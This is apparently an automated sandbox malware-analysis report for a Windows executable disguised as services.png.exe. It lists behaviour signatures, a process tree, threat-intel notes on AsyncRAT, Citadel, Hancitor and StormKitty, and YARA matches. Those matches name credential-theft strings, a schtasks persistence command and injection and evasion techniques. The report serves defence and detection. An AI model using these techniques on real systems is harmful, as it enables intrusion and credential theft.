Edit tour

Windows Analysis Report
services.png.exe

Overview

General Information

Sample name:	services.png.exe
Analysis ID:	1603732
MD5:	d397a1de162f332782fe3205a07792dd
SHA1:	44793b3a374c3cb453bbd87a2fd28d8a4c408002
SHA256:	ea251bf7fcc0a42cb9e954a45d925ef379ef1ffca39e482f44af701b4ace8560
Tags:	exeuser-juroots
Infos:

Detection

AsyncRAT, Atmos, Citadel, Hancitor, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected Atmos Banker

Yara detected Citadel

Yara detected Hancitor

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected WorldWind Stealer

Allocates memory in foreign processes

Connects to a pastebin service (likely for C&C)

Creates a thread in another existing process (thread injection)

Disables Internet Explorer cookie cleaning (a user can no longer delete cookies)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Internet Explorer zone settings

Modifies the prolog of user mode functions (user mode inline hooks)

Monitors registry run keys for changes

Overwrites Windows DLL code with PUSH RET codes

Overwrites code with function prologues

Queries Google from non browser process on port 80

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Renames NTDLL to bypass HIPS

Self deletion via cmd or bat file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses an obfuscated file name to hide its real file extension (double extension)

Uses known network protocols on non-standard ports

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes Internet Explorer cookies via registry

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May initialize a security null descriptor

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

services.png.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\services.png.exe" MD5: D397A1DE162F332782FE3205A07792DD)

nyheukpo.exe (PID: 1460 cmdline: "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe" MD5: 473AD0AE876C0AF9537D6024B36DC538)

sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)

svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ctfmon.exe (PID: 3832 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)

RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)

RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)

TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)

RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)

WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)

RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)

UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)

svchost.exe (PID: 1856 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dllhost.exe (PID: 6064 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)

backgroundTaskHost.exe (PID: 4884 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)

RuntimeBroker.exe (PID: 2056 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

RuntimeBroker.exe (PID: 6120 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

XRdxSzSUL8yOL.exe (PID: 5012 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 4908 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\TOxmmzl2Y.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 3804 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\vfhGgPZc.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 4176 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\vWyNw5R3yLgiPzvoddg.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 4080 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\qKutqjJlu1qqWCF2Kuohxe8.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 2996 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\JNG18ZhoYOsu.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 1720 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\VlKnpZ4GB6as59.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 2008 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XSnEnFYbz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 2496 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\06fPMOvvheMyY666O.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 4456 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\kTHroMrW0Jy5hVZBjz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 5608 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\GMl8ex5IGBINFDUC0pDJ7G.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

XRdxSzSUL8yOL.exe (PID: 5728 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\5cJeh7R0c9tyMCIlvC.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Atmosphere		Silence group	https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/ https://www.group-ib.com/resources/threat-research/silence.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere

Name	Description	Attribution	Blogpost URLs	Link
Citadel		No Attribution	http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html http://www.xylibox.com/2016/02/citadel-0011-atmos.html https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/ https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree	https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel

Name	Description	Attribution	Blogpost URLs	Link
Hancitor	Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.	No Attribution	https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/ https://blog.group-ib.com/hancitor-cuba-ransomware https://blog.group-ib.com/prometheus-tds https://blog.group-ib.com/switching-side-jobs https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
services.png.exe	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
dump.pcap	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1f1b4c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
sslproxydump.pcap	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x4d3:$sk01: LimerBoy/StormKitty 0x273e4:$sk01: LimerBoy/StormKitty 0x1bdb8:$str01: set_sUsername 0x1bfc5:$str02: set_sIsSecure 0x1ca39:$str03: set_sExpMonth 0x1dd5d:$str04: WritePasswords 0x1ded8:$str05: WriteCookies 0x1e276:$str06: sChromiumPswPaths 0x1e263:$str07: sGeckoBrowserPaths 0x236b7:$str08: Username: {1} 0x2485f:$str08: Username: {1} 0x236d3:$str09: Password: {2} 0x2487b:$str09: Password: {2} 0x25995:$str10: encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1c837:$str01: get_ActivatePong 0x1eb2d:$str02: get_SslClient 0x1eb49:$str03: get_TcpClient 0x1b02a:$str04: get_SendSync 0x1b26a:$str05: get_IsConnected 0x1c385:$str06: set_UseShellExecute 0x27e8e:$str07: Pastebin 0x21da3:$str08: Select * from AntivirusProduct 0x27d68:$str10: timeout 3 > NUL 0x27c66:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x27cf6:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x27cf8:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x24279:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x26355:$s1: \VPN\NordVPN 0x2633b:$s2: \VPN\OpenVPN 0x2631d:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x24ab1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x24b23:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24bad:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24c3f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24ca9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24d1b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x24db1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x24e41:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x4dc:$x3: StormKitty 0x1aa11:$s1: GetBSSID 0x1e700:$s2: GetAntivirus 0x25761:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x25993:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x4d3:$sk01: LimerBoy/StormKitty 0x273e4:$sk01: LimerBoy/StormKitty 0x1bdb8:$str01: set_sUsername 0x1bfc5:$str02: set_sIsSecure 0x1ca39:$str03: set_sExpMonth 0x1dd5d:$str04: WritePasswords 0x1ded8:$str05: WriteCookies 0x1e276:$str06: sChromiumPswPaths 0x1e263:$str07: sGeckoBrowserPaths 0x236b7:$str08: Username: {1} 0x2485f:$str08: Username: {1} 0x236d3:$str09: Password: {2} 0x2487b:$str09: Password: {2} 0x25995:$str10: encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1c837:$str01: get_ActivatePong 0x1eb2d:$str02: get_SslClient 0x1eb49:$str03: get_TcpClient 0x1b02a:$str04: get_SendSync 0x1b26a:$str05: get_IsConnected 0x1c385:$str06: set_UseShellExecute 0x27e8e:$str07: Pastebin 0x21da3:$str08: Select * from AntivirusProduct 0x27d68:$str10: timeout 3 > NUL 0x27c66:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x27cf6:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x27cf8:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x24279:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x26355:$s1: \VPN\NordVPN 0x2633b:$s2: \VPN\OpenVPN 0x2631d:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x24ab1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x24b23:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24bad:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24c3f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24ca9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24d1b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x24db1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x24e41:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x4dc:$x3: StormKitty 0x1aa11:$s1: GetBSSID 0x1e700:$s2: GetAntivirus 0x25761:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x25993:$s6: "encrypted_key":"(.*?)"
Click to see the 24 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
